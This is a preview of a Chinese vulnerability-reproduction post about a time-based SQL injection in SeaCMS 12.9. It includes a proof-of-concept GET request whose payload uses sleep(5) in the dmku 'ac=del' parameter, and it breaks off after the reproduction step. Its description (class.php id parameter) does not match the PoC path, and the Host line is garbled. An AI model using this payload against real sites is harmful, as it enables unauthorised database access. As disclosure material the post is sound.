文章预览
网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 SeaCMS是一套使用PHP编写的免费、开源的网站内容管理系统。该系统主要被设计用来管理视频点播资源。 SeaCMS 12.9版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许未经身份验证的远程攻击者执行任意代码并通过class.php中的id参数获取敏感信息。 0x02影响版本 SeaCMS 12.9版本 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现 POC (GET) 漏洞复现 GET /js/player/dmplayer/dmku/?ac=del =( select ( 0 ) from ( select ( sleep ( 5 )))v) & type = list HTTP / 1.1 Host: 127.0 .1 . Upgrade -Insecure-Requests: 1 User - Agent : Mozilla/ 5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 延时注入 5秒 3.
………………………………
